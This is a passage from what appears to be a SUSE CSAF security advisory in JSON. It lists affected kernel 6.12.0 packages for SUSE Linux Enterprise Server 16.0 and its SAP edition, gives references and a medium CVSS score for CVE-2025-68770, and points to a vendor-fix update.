"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68770",
"url": "https://www.suse.com/security/cve/CVE-2025-68770"
},
{
"category": "external",
"summary": "SUSE Bug 1256584 for CVE-2025-68770",
"url": "https://bugzilla.suse.com/1256584"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68770"
},
{
"cve": "CVE-2025-68771",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68771"
}
],
"notes": [
{
"category": "general",
